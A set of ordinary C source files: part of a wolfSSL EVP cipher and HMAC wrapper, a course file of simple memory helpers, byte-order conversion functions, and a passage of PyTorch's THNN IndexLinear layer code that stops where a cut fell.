AES_192_CBC_TYPE: case AES_256_CBC_TYPE: if (ctx->enc) ret = wc_AesCbcEncrypt(&ctx->cipher.aes, out, in, inl); else ret = wc_AesCbcDecrypt(&ctx->cipher.aes, out, in, inl); break; #endif #if !defined(NO_AES) && defined(WOLFSSL_AES_COUNTER) case AES_128_CTR_TYPE: case AES_192_CTR_TYPE: case AES_256_CTR_TYPE: if (ctx->enc) ret = wc_AesCtrEncrypt(&ctx->cipher.aes, out, in, inl); else ret = wc_AesCtrEncrypt(&ctx->cipher.aes, out, in, inl); break; #endif #if !defined(NO_AES) && defined(HAVE_AES_ECB) case AES_128_ECB_TYPE: case AES_192_ECB_TYPE: case AES_256_ECB_TYPE: if (ctx->enc) ret = wc_AesEcbEncrypt(&ctx->cipher.aes, out, in, inl); else ret = wc_AesEcbDecrypt(&ctx->cipher.aes, out, in, inl); break; #endif #ifndef NO_DES3 case DES_CBC_TYPE: if (ctx->enc) ret = wc_Des_CbcEncrypt(&ctx->cipher.des, out, in, inl); else ret = wc_Des_CbcDecrypt(&ctx->cipher.des, out, in, inl); break; case DES_EDE3_CBC_TYPE: if (ctx->enc) ret = wc_Des3_CbcEncrypt(&ctx->cipher.des3, out, in, inl); else ret = wc_Des3_CbcDecrypt(&ctx->cipher.des3, out, in, inl); break; #if defined(WOLFSSL_DES_ECB) case DES_ECB_TYPE: ret = wc_Des_EcbEncrypt(&ctx->cipher.des, out, in, inl); break; case DES_EDE3_ECB_TYPE: ret = wc_Des3_EcbEncrypt(&ctx->cipher.des3, out, in, inl); break; #endif /* WOLFSSL_DES_ECB */ #endif /* !NO_DES3 */ default: return 0; } if (ret != 0) return 0; /* failure */ (void)in; (void)inl; (void)out; return 1; /* success */ } WOLFSSL_API int wolfSSL_EVP_CipherUpdate(WOLFSSL_EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl, const unsigned char *in, int inl) { int blocks; int fill; if (ctx == NULL) return BAD_FUNC_ARG; WOLFSSL_ENTER("wolfSSL_EVP_CipherUpdate"); *outl = 0; if (ctx->bufUsed > 0) { /* concatinate them if there is anything */ fill = fillBuff(ctx, in, inl); inl -= fill; in += fill; } if((ctx->enc == 0)&& (ctx->lastUsed == 1)){ PRINT_BUF(ctx->lastBlock, ctx->block_size); XMEMCPY(out, ctx->lastBlock, ctx->block_size); *outl+= ctx->block_size; out += ctx->block_size; } if ((ctx->bufUsed == ctx->block_size) || (ctx->flags & WOLFSSL_EVP_CIPH_NO_PADDING)){ /* the buff is full, flash out */ PRINT_BUF(ctx->buf, ctx->block_size); if (evpCipherBlock(ctx, out, ctx->buf, ctx->block_size) == 0) return 0; PRINT_BUF(out, ctx->block_size); if(ctx->enc == 0){ ctx->lastUsed = 1; XMEMCPY(ctx->lastBlock, out, ctx->block_size); } else { *outl+= ctx->block_size; out += ctx->block_size; } ctx->bufUsed = 0; } blocks = inl / ctx->block_size; if (blocks > 0) { /* process blocks */ if (evpCipherBlock(ctx, out, in, blocks*ctx->block_size) == 0) return 0; PRINT_BUF(ctx->buf, ctx->block_size); PRINT_BUF(out, ctx->block_size); inl -= ctx->block_size * blocks; in += ctx->block_size * blocks; if(ctx->enc == 0){ ctx->lastUsed = 1; XMEMCPY(ctx->lastBlock, &out[ctx->block_size * (blocks-1)], ctx->block_size); *outl+= ctx->block_size * (blocks-1); } else { *outl+= ctx->block_size * blocks; } } if (inl > 0) { /* put fraction into buff */ fillBuff(ctx, in, inl); /* no increase of outl */ } (void)out; /* silence warning in case not read */ return 1; } static void padBlock(WOLFSSL_EVP_CIPHER_CTX *ctx) { int i; for (i = ctx->bufUsed; i < ctx->block_size; i++) ctx->buf[i] = (byte)(ctx->block_size - ctx->bufUsed); } static int checkPad(WOLFSSL_EVP_CIPHER_CTX *ctx, unsigned char *buff) { int i; int n; n = buff[ctx->block_size-1]; if (n > ctx->block_size) return FALSE; for (i = 0; i < n; i++){ if (buff[ctx->block_size-i-1] != n) return FALSE; } return ctx->block_size - n; } WOLFSSL_API int wolfSSL_EVP_CipherFinal(WOLFSSL_EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl) { int fl ; if (ctx == NULL || out == NULL) return BAD_FUNC_ARG; WOLFSSL_ENTER("wolfSSL_EVP_CipherFinal"); if (ctx->flags & WOLFSSL_EVP_CIPH_NO_PADDING) { if (ctx->bufUsed != 0) return 0; *outl = 0; return 1; } if (ctx->enc) { if (ctx->block_size == 1){ *outl = 0; return 1; } if ((ctx->bufUsed >= 0) && (ctx->block_size != 1)) { padBlock(ctx); PRINT_BUF(ctx->buf, ctx->block_size); if (evpCipherBlock(ctx, out, ctx->buf, ctx->block_size) == 0) return 0; PRINT_BUF(out, ctx->block_size); *outl = ctx->block_size; } } else { if (ctx->block_size == 1){ *outl = 0; return 1; } if (ctx->lastUsed){ PRINT_BUF(ctx->lastBlock, ctx->block_size); if ((fl = checkPad(ctx, ctx->lastBlock)) >= 0) { XMEMCPY(out, ctx->lastBlock, fl); *outl = fl; } else return 0; } } return 1; } WOLFSSL_API int wolfSSL_EVP_CIPHER_CTX_block_size(const WOLFSSL_EVP_CIPHER_CTX *ctx) { if (ctx == NULL) return BAD_FUNC_ARG; switch (ctx->cipherType) { #if !defined(NO_AES) && defined(HAVE_AES_CBC) case AES_128_CBC_TYPE: case AES_192_CBC_TYPE: case AES_256_CBC_TYPE: #endif #if !defined(NO_AES) && defined(WOLFSSL_AES_COUNTER) case AES_128_CTR_TYPE: case AES_192_CTR_TYPE: case AES_256_CTR_TYPE: #endif #if !defined(NO_AES) case AES_128_ECB_TYPE: case AES_192_ECB_TYPE: case AES_256_ECB_TYPE: #endif #ifndef NO_DES3 case DES_CBC_TYPE: case DES_ECB_TYPE: case DES_EDE3_CBC_TYPE: case DES_EDE3_ECB_TYPE: #endif return ctx->block_size; default: return 0; } } static unsigned int cipherType(const WOLFSSL_EVP_CIPHER *cipher) { if (cipher == NULL) return 0; /* dummy for #ifdef */ #ifndef NO_DES3 else if (XSTRNCMP(cipher, EVP_DES_CBC, EVP_DES_SIZE) == 0) return DES_CBC_TYPE; else if (XSTRNCMP(cipher, EVP_DES_EDE3_CBC, EVP_DES_EDE3_SIZE) == 0) return DES_EDE3_CBC_TYPE; #if !defined(NO_DES3) else if (XSTRNCMP(cipher, EVP_DES_ECB, EVP_DES_SIZE) == 0) return DES_ECB_TYPE; else if (XSTRNCMP(cipher, EVP_DES_EDE3_ECB, EVP_DES_EDE3_SIZE) == 0) return DES_EDE3_ECB_TYPE; #endif /* NO_DES3 && HAVE_AES_ECB */ #endif #if !defined(NO_AES) && defined(HAVE_AES_CBC) else if (XSTRNCMP(cipher, EVP_AES_128_CBC, EVP_AES_SIZE) == 0) return AES_128_CBC_TYPE; else if (XSTRNCMP(cipher, EVP_AES_192_CBC, EVP_AES_SIZE) == 0) return AES_192_CBC_TYPE; else if (XSTRNCMP(cipher, EVP_AES_256_CBC, EVP_AES_SIZE) == 0) return AES_256_CBC_TYPE; #endif /* !NO_AES && HAVE_AES_CBC */ #if !defined(NO_AES) && defined(WOLFSSL_AES_COUNTER) else if (XSTRNCMP(cipher, EVP_AES_128_CTR, EVP_AES_SIZE) == 0) return AES_128_CTR_TYPE; else if (XSTRNCMP(cipher, EVP_AES_192_CTR, EVP_AES_SIZE) == 0) return AES_192_CTR_TYPE; else if (XSTRNCMP(cipher, EVP_AES_256_CTR, EVP_AES_SIZE) == 0) return AES_256_CTR_TYPE; #endif /* !NO_AES && HAVE_AES_CBC */ #if !defined(NO_AES) && defined(HAVE_AES_ECB) else if (XSTRNCMP(cipher, EVP_AES_128_ECB, EVP_AES_SIZE) == 0) return AES_128_ECB_TYPE; else if (XSTRNCMP(cipher, EVP_AES_192_ECB, EVP_AES_SIZE) == 0) return AES_192_ECB_TYPE; else if (XSTRNCMP(cipher, EVP_AES_256_ECB, EVP_AES_SIZE) == 0) return AES_256_ECB_TYPE; #endif /* !NO_AES && HAVE_AES_CBC */ else return 0; } WOLFSSL_API int wolfSSL_EVP_CIPHER_block_size(const WOLFSSL_EVP_CIPHER *cipher) { if (cipher == NULL) return BAD_FUNC_ARG; switch (cipherType(cipher)) { #if !defined(NO_AES) && defined(HAVE_AES_CBC) case AES_128_CBC_TYPE: case AES_192_CBC_TYPE: case AES_256_CBC_TYPE: return AES_BLOCK_SIZE; #endif #if !defined(NO_AES) && defined(WOLFSSL_AES_COUNTER) case AES_128_CTR_TYPE: case AES_192_CTR_TYPE: case AES_256_CTR_TYPE: return AES_BLOCK_SIZE; #endif #if !defined(NO_AES) && defined(HAVE_AES_ECB) case AES_128_ECB_TYPE: case AES_192_ECB_TYPE: case AES_256_ECB_TYPE: return AES_BLOCK_SIZE; #endif #ifndef NO_DES3 case DES_CBC_TYPE: return 8; case DES_EDE3_CBC_TYPE: return 8; case DES_ECB_TYPE: return 8; case DES_EDE3_ECB_TYPE: return 8; #endif default: return 0; } } unsigned long WOLFSSL_CIPHER_mode(const WOLFSSL_EVP_CIPHER *cipher) { switch (cipherType(cipher)) { #if !defined(NO_AES) && defined(HAVE_AES_CBC) case AES_128_CBC_TYPE: case AES_192_CBC_TYPE: case AES_256_CBC_TYPE: return WOLFSSL_EVP_CIPH_CBC_MODE ; #endif #if !defined(NO_AES) && defined(WOLFSSL_AES_COUNTER) case AES_128_CTR_TYPE: case AES_192_CTR_TYPE: case AES_256_CTR_TYPE: return WOLFSSL_EVP_CIPH_CTR_MODE ; #endif #if !defined(NO_AES) case AES_128_ECB_TYPE: case AES_192_ECB_TYPE: case AES_256_ECB_TYPE: return WOLFSSL_EVP_CIPH_ECB_MODE ; #endif #ifndef NO_DES3 case DES_CBC_TYPE: case DES_EDE3_CBC_TYPE: return WOLFSSL_EVP_CIPH_CBC_MODE ; case DES_ECB_TYPE: case DES_EDE3_ECB_TYPE: return WOLFSSL_EVP_CIPH_ECB_MODE ; #endif default: return 0; } } WOLFSSL_API unsigned long WOLFSSL_EVP_CIPHER_mode(const WOLFSSL_EVP_CIPHER *cipher) { if (cipher == NULL) return 0; return WOLFSSL_CIPHER_mode(cipher); } WOLFSSL_API void wolfSSL_EVP_CIPHER_CTX_set_flags(WOLFSSL_EVP_CIPHER_CTX *ctx, int flags) { if (ctx != NULL) { ctx->flags = flags; } } WOLFSSL_API unsigned long wolfSSL_EVP_CIPHER_flags(const WOLFSSL_EVP_CIPHER *cipher) { if (cipher == NULL) return 0; return WOLFSSL_CIPHER_mode(cipher); } WOLFSSL_API int wolfSSL_EVP_CIPHER_CTX_set_padding(WOLFSSL_EVP_CIPHER_CTX *ctx, int padding) { if (ctx == NULL) return BAD_FUNC_ARG; if (padding) { ctx->flags &= ~WOLFSSL_EVP_CIPH_NO_PADDING; } else { ctx->flags |= WOLFSSL_EVP_CIPH_NO_PADDING; } return 1; } WOLFSSL_API int wolfSSL_EVP_add_digest(const WOLFSSL_EVP_MD *digest) { (void)digest; /* nothing to do */ return 0; } WOLFSSL_API int wolfSSL_EVP_add_cipher(const WOLFSSL_EVP_CIPHER *cipher) { (void)cipher; /* nothing to do */ return 0; } WOLFSSL_EVP_PKEY* wolfSSL_EVP_PKEY_new_mac_key(int type, ENGINE* e, const unsigned char* key, int keylen) { WOLFSSL_EVP_PKEY* pkey; (void)e; if (type != EVP_PKEY_HMAC || (key == NULL && keylen != 0)) return NULL; pkey = wolfSSL_PKEY_new(); if (pkey != NULL) { pkey->pkey.ptr = (char*)XMALLOC(keylen, NULL, DYNAMIC_TYPE_PUBLIC_KEY); if (pkey->pkey.ptr == NULL && keylen > 0) { wolfSSL_EVP_PKEY_free(pkey); pkey = NULL; } else { XMEMCPY(pkey->pkey.ptr, key, keylen); pkey->pkey_sz = keylen; pkey->type = pkey->save_type = type; } } return pkey; } const unsigned char* wolfSSL_EVP_PKEY_get0_hmac(const WOLFSSL_EVP_PKEY* pkey, size_t* len) { if (pkey == NULL || len == NULL) return NULL; *len = (size_t)pkey->pkey_sz; return (const unsigned char*)pkey->pkey.ptr; } int wolfSSL_EVP_DigestSignInit(WOLFSSL_EVP_MD_CTX *ctx, WOLFSSL_EVP_PKEY_CTX **pctx, const WOLFSSL_EVP_MD *type, WOLFSSL_ENGINE *e, WOLFSSL_EVP_PKEY *pkey) { int hashType; const unsigned char* key; size_t keySz; /* Unused parameters */ (void)pctx; (void)e; WOLFSSL_ENTER("EVP_DigestSignInit"); if (ctx == NULL || type == NULL || pkey == NULL) return BAD_FUNC_ARG; #ifdef WOLFSSL_ASYNC_CRYPT /* compile-time validation of ASYNC_CTX_SIZE */ typedef char async_test[WC_ASYNC_DEV_SIZE >= sizeof(WC_ASYNC_DEV) ? 1 : -1]; (void)sizeof(async_test); #endif if (XSTRNCMP(type, "SHA256", 6) == 0) { hashType = WC_SHA256; } #ifdef WOLFSSL_SHA224 else if (XSTRNCMP(type, "SHA224", 6) == 0) { hashType = WC_SHA224; } #endif #ifdef WOLFSSL_SHA384 else if (XSTRNCMP(type, "SHA384", 6) == 0) { hashType = WC_SHA384; } #endif #ifdef WOLFSSL_SHA512 else if (XSTRNCMP(type, "SHA512", 6) == 0) { hashType = WC_SHA512; } #endif #ifndef NO_MD5 else if (XSTRNCMP(type, "MD5", 3) == 0) { hashType = WC_MD5; } #endif #ifndef NO_SHA /* has to be last since would pick or 224, 256, 384, or 512 too */ else if (XSTRNCMP(type, "SHA", 3) == 0) { hashType = WC_SHA; } #endif /* NO_SHA */ else return BAD_FUNC_ARG; key = wolfSSL_EVP_PKEY_get0_hmac(pkey, &keySz); if (wc_HmacInit(&ctx->hash.hmac, NULL, INVALID_DEVID) != 0) return 0; if (wc_HmacSetKey(&ctx->hash.hmac, hashType, key, (word32)keySz) != 0) return 0; ctx->macType = NID_hmac & 0xFF; return 1; } int wolfSSL_EVP_DigestSignUpdate(WOLFSSL_EVP_MD_CTX *ctx, const void *d, unsigned int cnt) { WOLFSSL_ENTER("EVP_DigestSignFinal"); if (ctx->macType != (NID_hmac & 0xFF)) return 0; if (wc_HmacUpdate(&ctx->hash.hmac, (const byte *)d, cnt) != 0) return 0; return 1; } int wolfSSL_EVP_DigestSignFinal(WOLFSSL_EVP_MD_CTX *ctx, unsigned char *sig, size_t *siglen) { unsigned char digest[MAX_DIGEST_SIZE]; Hmac hmacCopy; int hashLen, ret; WOLFSSL_ENTER("EVP_DigestSignFinal"); if (ctx == NULL || siglen == NULL) return 0; if (ctx->macType != (NID_hmac & 0xFF)) return 0; switch (ctx->hash.hmac.macType) { #ifndef NO_MD5 case WC_MD5: hashLen = WC_MD5_DIGEST_SIZE; break; #endif /* !NO_MD5 */ #ifndef NO_SHA case WC_SHA: hashLen = WC_SHA_DIGEST_SIZE; break; #endif /* !NO_SHA */ #ifdef WOLFSSL_SHA224 case WC_SHA224: hashLen = WC_SHA224_DIGEST_SIZE; break; #endif /* WOLFSSL_SHA224 */ #ifndef NO_SHA256 case WC_SHA256: hashLen = WC_SHA256_DIGEST_SIZE; break; #endif /* !NO_SHA256 */ #ifdef WOLFSSL_SHA512 #ifdef WOLFSSL_SHA384 case WC_SHA384: hashLen = WC_SHA384_DIGEST_SIZE; break; #endif /* WOLFSSL_SHA384 */ case WC_SHA512: hashLen = WC_SHA512_DIGEST_SIZE; break; #endif /* WOLFSSL_SHA512 */ #ifdef HAVE_BLAKE2 case BLAKE2B_ID: hashLen = BLAKE2B_OUTBYTES; break; #endif /* HAVE_BLAKE2 */ default: return 0; } if (sig == NULL) { *siglen = hashLen; return 1; } if ((int)(*siglen) > hashLen) *siglen = hashLen; XMEMCPY(&hmacCopy, &ctx->hash.hmac, sizeof(hmacCopy)); ret = wc_HmacFinal(&hmacCopy, digest) == 0; if (ret == 1) XMEMCPY(sig, digest, *siglen); ForceZero(&hmacCopy, sizeof(hmacCopy)); ForceZero(digest, sizeof(digest)); return ret; } #endif /* WOLFSSL_EVP_INCLUDED */ #if defined(OPENSSL_EXTRA) && !defined(NO_PWDBASED) && !defined(NO_SHA) WOLFSSL_API int wolfSSL_PKCS5_PBKDF2_HMAC_SHA1(const char *pass, int passlen, const unsigned char *salt, int saltlen, int iter, int keylen, unsigned char *out) { const char *nostring = ""; int ret = 0; if (pass == NULL){ passlen = 0; pass = nostring; } else if (passlen == -1){ passlen = (int)XSTRLEN(pass); } ret = wc_PBKDF2((byte*)out, (byte*)pass, passlen, (byte*)salt, saltlen, iter, keylen, WC_SHA); if (ret == 0) return SSL_SUCCESS; else return SSL_FAILURE; } #endif /* OPENSSL_EXTRA && !NO_PWDBASED !NO_SHA*/
the_stack_data/73576321.c
/****************************************************************************** * Copyright (C) 2017 by Alex Fosdick - University of Colorado * * Redistribution, modification or use of this software in source or binary * forms is permitted as long as the files maintain this copyright. Users are * permitted to modify this and use it to learn about the field of embedded * software. Alex Fosdick and the University of Colorado are not liable for any * misuse of this material. * *****************************************************************************/ /** * @file memory.c * @brief Abstraction of memory read and write operations * * This implementation file provides an abstraction of reading and * writing to memory via function calls. There is also a globally * allocated buffer array used for manipulation. * * @author Alex Fosdick * @date April 1 2017 * */ #include "memory.h" /*********************************************************** Function Definitions ***********************************************************/ void set_value(char * ptr, unsigned int index, char value){ ptr[index] = value; } void clear_value(char * ptr, unsigned int index){ set_value(ptr, index, 0); } char get_value(char * ptr, unsigned int index){ return ptr[index]; } void set_all(char * ptr, char value, unsigned int size){ unsigned int i; for(i = 0; i < size; i++) { set_value(ptr, i, value); } } void clear_all(char * ptr, unsigned int size){ set_all(ptr, 0, size); }
the_stack_data/100547.c
#include <stdint.h> #include <arpa/inet.h> #ifndef htonll static inline int is_big_endian(void) { uint16_t endianess = 1; if (*((uint8_t *)(&endianess))) return 0; else return 1; } uint64_t htonll(uint64_t hostlong) { if (is_big_endian()) return hostlong; else return ((uint64_t)htonl(hostlong & 0xFFFFFFFF) << 32 | htonl(hostlong >> 32)); } uint64_t ntohll(uint64_t netlong) { if (is_big_endian()) return netlong; else return ((uint64_t)ntohl(netlong & 0xFFFFFFFF) << 32 | ntohl(netlong >> 32)); } #endif float ntohf(uint32_t netfloat) { union { float _float; uint32_t _int; } val; val._int = ntohl(netfloat); return val._float; } uint32_t htonf(float hostfloat) { union { float _float; uint32_t _int; } val; val._float = hostfloat; return htonl(val._int); }
the_stack_data/127201.c
#ifndef TH_GENERIC_FILE #define TH_GENERIC_FILE "THNN/generic/IndexLinear.c" #else #ifdef _OPENMP #include <omp.h> #endif /* Threshold used to trigger multithreading */ #ifndef THNN_SPARSE_OMP_THRESHOLD #define THNN_SPARSE_OMP_THRESHOLD 100000 #endif /* Threshold used to trigger BLAS axpy call */ #ifndef THNN_SPARSE_OUTDIM_THRESHOLD #define THNN_SPARSE_OUTDIM_THRESHOLD 49 #endif /* sign MACRO */ #ifndef THNN_INDEXLINEAR_SIGN #define THNN_INDEXLINEAR_SIGN(a) ( ( (a) < 0 ) ? -1 : ( (a) > 0 ) ) #endif static bool THNN_(checkKeysValues)(THLongTensor* keys, THTensor* values) { return THLongTensor_size(keys, 0) == THTensor_(nElement)(values) && THTensor_(nDimensionLegacyAll)(values) == 1 && THLongTensor_nDimensionLegacyAll(keys) == 1; } void THNN_(IndexLinear_updateOutput)( THNNState *state, THLongTensor *keys, int64_t keysOffset, THTensor *values, THLongTensor *sizes, THLongTensor *cumSumSizes, THTensor *output, THTensor *weight, THTensor *bias, THTensor *normalizedValues, int train) { /* Retrieve all the dimensions of the problem */ int64_t batchSize = THLongTensor_size(sizes, 0); int64_t keysSize = THLongTensor_size(keys, 0); int64_t outDim = THTensor_(size)(bias, 0); int64_t woutDim = THTensor_(size)(weight, 1); int maxNormalize = woutDim - outDim; int64_t* sizesData = THLongTensor_data(sizes); int64_t* cumSumSizesData = THLongTensor_data(cumSumSizes); /* Define/resize the normalized values tensor if maxNormalize is > 0 */ scalar_t* normalizedValuesData = NULL; if (maxNormalize) { THTensor_(resize1d)(normalizedValues, keysSize); normalizedValuesData = normalizedValues->data<scalar_t>(); } /* Resize the output */ THTensor_(resize2d)(output, batchSize, outDim); /* Access the storage data/strides */ scalar_t* outputData = output->data<scalar_t>(); scalar_t* valuesData = values->data<scalar_t>(); scalar_t* weightData = weight->data<scalar_t>(); int64_t weightStride0 = weight->stride(0); scalar_t* biasData = bias->data<scalar_t>(); int64_t* keysData = THLongTensor_data(keys); /* Make sure these inputs are contiguous to accelerate computations */ THArgCheck(THLongTensor_isContiguous(keys), 1, "keys vector must be contiguous"); THArgCheck(THTensor_(isContiguous)(values), 3, "values vector must be contiguous"); THArgCheck(THTensor_(isContiguous)(output), 6, "output vector must be contiguous"); THArgCheck(THTensor_(isContiguous)(weight), 7, "weight matrix must be contiguous"); THArgCheck(THTensor_(isContiguous)(bias), 8, "bias vector must be contiguous"); THArgCheck(THNN_(checkKeysValues)(keys, values), 1, "Keys and values should have the same number of elements"); THArgCheck(THTensor_(isContiguous)(normalizedValues), 9, "normalizedValues vector must be contiguous"); int64_t i,j,k; /* Separate cases: output dimension is == 1, or > 1 * This allows for some optimizations. */ if (outDim == 1) { THVector_(fill)(outputData, *biasData, batchSize); if (maxNormalize) { /* Parallelize on the batch itself */ #pragma omp parallel \ for private(i,j) \ firstprivate(outDim, keysOffset, \ weightData, keysData, \ valuesData, outputData, \ cumSumSizesData, sizesData) \ schedule(static) \ if(keysSize*outDim > THNN_SPARSE_OMP_THRESHOLD && batchSize > 1) for (j = 0; j < batchSize; j++) { scalar_t* loutputData = outputData + j; scalar_t val = 0; scalar_t absVal = 0; int64_t offset = j == 0 ? 0 : cumSumSizesData[j - 1]; for (i = 0; i < sizesData[j]; i++) { int64_t woffset = weightStride0*(keysData[offset] + keysOffset); absVal = fabs(valuesData[offset]); if (train) { if (absVal > weightData[woffset]) { weightData[woffset] = absVal; weightData[woffset+1] = 1/absVal; } /* * The following can be used to scale the size of the updates * depending on some rule, e.g. the frequency of a feature, ... * This is used at update time. * TODO: implement a smarter update scale. */ weightData[woffset+2] = 1; } normalizedValuesData[offset] = (absVal > weightData[woffset] ? THNN_INDEXLINEAR_SIGN(valuesData[offset]):valuesData[offset]*weightData[woffset+1]) + weightData[woffset+3]; val += normalizedValuesData[offset] * weightData[woffset+maxNormalize]; offset++; } *loutputData += val; } } else { /* Parallelize on the batch itself */ #pragma omp parallel \ for private(i,j) \ firstprivate(outDim, weightData, \ keysData, valuesData, \ outputData, cumSumSizesData, \ sizesData) \ schedule(static) \ if(keysSize*outDim > THNN_SPARSE_OMP_THRESHOLD && batchSize > 1) for (j = 0; j < batchSize; j++) { int64_t offset = j == 0 ? 0 : cumSumSizesData[j - 1]; scalar_t* loutputData = outputData + j; scalar_t val = 0; for (i = 0; i < sizesData[j]; i++) { val += weightData[weightStride0*(keysData[offset] + keysOffset)] * valuesData[offset]; offset++; } *loutputData += val; } } } else { #pragma omp parallel \ for private(i,j,k) \ firstprivate(outDim, weightData, \ keysData, valuesData, \ biasData, outputData, \ cumSumSizesData, sizesData) \ schedule(static) \ if(keysSize*outDim > THNN_SPARSE_OMP_THRESHOLD && batchSize > 1) for (j = 0; j < batchSize; j++) { int64_t offset = j == 0 ? 0 : cumSumSizesData[j - 1]; scalar_t val; scalar_t* loutputData = outputData + j*outDim; scalar_t* lweightData = weightData; memcpy(loutputData, biasData, outDim*sizeof(scalar_t)); for (i = 0; i < sizesData[j]; i++) { int64_t woffset = weightStride0*(keysData[offset] + keysOffset); if (maxNormalize) { val = valuesData[offset]; scalar_t absVal = fabs(val); if (train) { if (absVal > weightData[woffset]) { weightData[woffset] = absVal; weightData[woffset+1] = 1/absVal; } /* * The following can be used to scale the size of the updates * depending on some rule, e.g. the frequency of a feature, ... * The commented section thereafter is just an example of what can be done: * *``` * weightData[woffset+2] = weightData[woffset+2]==0?1:(weightData[woffset+2] / (weightData[woffset+2] + 1)); * scalar_t alpha = 1; * scalar_t beta = 0.01; * scalar_t gamma = 1 - 0.000001; * scalar_t l = weightData[woffset+2]==0?1/gamma:(weightData[woffset+2] - beta) / (alpha - beta); * l = gamma*l; * weightData[woffset+2] = (alpha-beta)*l + beta; * ``` * * TODO: implement a smarter update scale. */ weightData[woffset+2] = 1; } /* Normalize + Clamp */ val = (absVal > weightData[woffset] ? THNN_INDEXLINEAR_SIGN(val):val*weightData[woffset+1]) + weightData[woffset+3]; normalizedValuesData[offset] = val; lweightData = weightData + woffset + maxNormalize; } else { val = valuesData[offset]; lweightData = weightData + woffset; } if (outDim > THNN_SPARSE_OUTDIM_THRESHOLD) { THBlas_(axpy)(outDim, val, lweightData, 1, loutputData, 1); } else { for (k=0; k < outDim; k++) { loutputData[k] += lweightData[k] * val; } } offset++; } } } return; } void THNN_(IndexLinear_updateParameters)( THNNState *state, THTensor *gradWeight, THTensor *gradBias, THTensor *weight, THTensor *bias, THLongTensor *runningKeys, THLongTensor *cumSumSizes, int64_t keysOffset, accreal weightDecay_, accreal learningRate_) { scalar_t weightDecay = TH_CONVERT_ACCREAL_TO_REAL(weightDecay_); scalar_t learningRate = TH_CONVERT_ACCREAL_TO_REAL(learningRate_); /* Retrieve all the dimensions of the problem */ int64_t outDim = THTensor_(size)(bias, 0); int64_t woutDim = THTensor_(size)(weight, 1); int maxNormalize = woutDim - outDim; int64_t keysSize = THLongTensor_size(runningKeys, 0); /* Access the storage data/strides */ scalar_t* gradWeightData = gradWeight->data<scalar_t>(); scalar_t* weightData = weight->data<scalar_t>(); int64_t weightStride0 = weight->stride(0); scalar_t* gradBiasData = gradBias->data<scalar_t>(); scalar_t* biasData = bias->data<scalar_t>(); int64_t* keysData = THLongTensor_data(runningKeys); /* Make sure these inputs are contiguous to accelerate computations */ THArgCheck(THTensor_(isContiguous)(gradWeight), 1, "gradWeight must be contiguous"); THArgCheck(THTensor_(isContiguous)(gradBias), 2, "gradBias vector must be contiguous"); THArgCheck(THTensor_(isContiguous)(weight), 3, "gradBias vector must be contiguous"); THArgCheck(THTensor_(isContiguous)(bias), 4, "gradBias vector must be contiguous"); THArgCheck(THLongTensor_isContiguous(runningKeys), 5, "keys vector must be contiguous"); int j, k; /* Update the bias first */ THVector_(cadd)(biasData, biasData, gradBiasData, -learningRate, outDim); /* Separate cases: output dimension is == 1, or > 1 * This allows for some optimizations. * No multithreading here as this could * corrupt the results (hogwild style) */ if (outDim == 1) { if (maxNormalize) { if (weightDecay) { for (j = 0; j < keysSize; j++) { int64_t woffset = weightStride0*(keysData[j] + keysOffset) + maxNormalize; scalar_t lr = learningRate*weightData[woffset-2]; weightData[woffset-1] -= weightData[woffset]*gradWeightData[2*j]*lr; weightData[woffset] -= gradWeightData[2*j+1]*lr - weightDecay * weightData[woffset-2] * weightData[woffset]; } } else { for (j = 0; j < keysSize; j++) { int64_t woffset = weightStride0*(keysData[j] + keysOffset) + maxNormalize; scalar_t lr = learningRate*weightData[woffset-2]; weightData[woffset-1] -= weightData[woffset]*gradWeightData[2*j]*lr; weightData[woffset] -= gradWeightData[2*j+1]*lr; } } } else { if (weightDecay) { for (j = 0; j < keysSize; j++) { int64_t woffset = weightStride0*(keysData[j] + keysOffset); weightData[woffset] -= gradWeightData[j]*learningRate + weightDecay * weightData[woffset]; } } else { for (j = 0; j < keysSize; j++) { weightData[weightStride0*(keysData[j] + keysOffset)] -= gradWeightData[j]*learningRate; } } } } else { for (j = 0; j < keysSize; j++) { scalar_t lr = learningRate; scalar_t wd = weightDecay; scalar_t* lweightData; int64_t woffset = weightStride0*(keysData[j] + keysOffset); scalar_t* lgradWeightData = gradWeightData + j*outDim; if (maxNormalize) { lgradWeightData += j*outDim; /* weightData[woffset + 2] */ lweightData = weightData + woffset + maxNormalize - 2; lr = lr*lweightData[0]; wd = weightDecay*lweightData[0]; /* weightData[woffset + 3] */ lweightData++; for (k=0; k < outDim; k++) { lweightData[0] -= lgradWeightData[k]*lweightData[k+1]*lr; } lweightData++; lgradWeightData += outDim; } else { lweightData = weightData + woffset; } /* We do sparse weight decay. * We think it makes more sense. */ if (weightDecay) { for (k=0; k < outDim; k++) { lweightData[k] -= lweightData[k]*wd; } } if (outDim > THNN_SPARSE_OUTDIM_THRESHOLD) { THBlas_(axpy)(outDim, -lr, lgradWeightData, 1, lweightData, 1); } else { for (k=0; k < outDim; k++) { lweightData[k] -= lgradWeightData[k]*lr; } } } } } void THNN_(IndexLinear_accUpdateGradParameters)( THNNState *state, THLongTensor *keys, int64_t keysOffset, THTensor *values, THLongTensor *sizes, THLongTensor *cumSumSizes, THTensor *gradOutput, THTensor *weight, THTensor *bias, accreal weightDecay_, accreal scale_) { scalar_t weightDecay = TH_CONVERT_ACCREAL_TO_REAL(weightDecay_); scalar_t scale = TH_CONVERT_ACCREAL_TO_REAL(scale_); /* Retrieve all the dimensions of the problem */ int64_t batchSize = THLongTensor_size(sizes, 0); int64_t outDim = THTensor_(size)(bias, 0); int64_t woutDim = THTensor_(size)(weight, 1); int maxNormalize = woutDim - outDim; THArgCheck(THNN_(checkKeysValues)(keys, values), 1, "Keys and values should have the same number of elements"); /* Access the storage data/strides */ scalar_t* gradOutputData = gradOutput->data<scalar_t>(); scalar_t* valuesData =values->data<scalar_t>(); scalar_t* weightData = weight->data<scalar_t>(); scalar_t* biasData = bias->data<scalar_t>(); int64_t weightStride0 = weight->stride(0); int64_t* keysData = THLongTensor_data(keys); int64_t* sizesData = THLongTensor_data(sizes); /* Make sure these inputs are contiguous to accelerate computations */ THArgCheck(THLongTensor_isContiguous(keys), 1, "keys vector must be contiguous"); THArgCheck(THTensor_(isContiguous)(values), 3, "values vector must be contiguous"); THArgCheck(THTensor_(isContiguous)(gradOutput), 6, "gradOutput vector must be contiguous"); THArgCheck(THTensor_(isContiguous)(weight), 7, "weight matrix must be contiguous"); THArgCheck(THTensor_(isContiguous)(bias), 8, "bias matrix must be contiguous"); int i,j,k; /* Separate cases: output dimension is == 